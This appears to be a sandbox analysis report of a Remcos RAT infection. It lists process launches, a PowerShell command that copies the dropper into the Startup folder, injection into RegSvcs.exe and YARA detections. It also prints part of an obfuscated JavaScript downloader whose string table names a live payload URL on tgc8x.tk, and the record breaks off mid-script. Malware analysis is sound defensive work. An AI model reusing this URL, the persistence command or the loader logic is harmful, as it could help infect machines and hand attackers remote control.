Commandline:	"C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe"
Imagebase:	0x540000
File size:	613184 bytes
MD5 hash:	5ED905205AEB85AF64B2FF567A8CF838
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	11
Start time:	23:36:03
Start date:	03/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell" Copy-Item 'C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
Imagebase:	0x160000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	12
Start time:	23:36:03
Start date:	03/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	13
Start time:	23:36:12
Start date:	03/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xa80000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Target ID:	17
Start time:	23:37:58
Start date:	03/11/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe"
Imagebase:	0x6b0000
File size:	613184 bytes
MD5 hash:	5ED905205AEB85AF64B2FF567A8CF838
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 65%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	18
Start time:	23:38:09
Start date:	03/11/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell" Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe'
Imagebase:	0x160000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	19
Start time:	23:38:10
Start date:	03/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	20
Start time:	23:38:27
Start date:	03/11/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xdc0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	function _0x5099(_0x304024, _0x5125dd) {	_0x5099(244,"dOyh") ➔ "]\x0e\xe58\xef" _0x5099(213,"SewZ") ➔ undefined _0x5099(244,"dOyh") ➔ "\xba\x9e\xda\xb9\xa9\xfdl\xa8\xf12;D" _0x5099(213,"SewZ") ➔ "\x02RvYjD\x89\x91\xc3\xec\xe0c" _0x5099(266,"SewZ") ➔ "m\x89Y\xb8\." _0x5099(219,")E2i") ➔ "\x0b1\xd1E\xa5\x9e5\xf3\xaf" _0x5099(255,"CZq%") ➔ undefined _0x5099(244,"dOyh") ➔ "\xf0\x0f,\xc6\xb1\xae\x95\xbf\xadZ;C" _0x5099(213,"SewZ") ➔ "\xfd\xdbYt\xbe\x96" _0x5099(266,"SewZ") ➔ "8\|\x0e\xf1\xed\xd1x"
1	var _0x3974d = _0x3974 ( );	_0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW _0x3974() ➔ ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW
2	return _0x5099 =
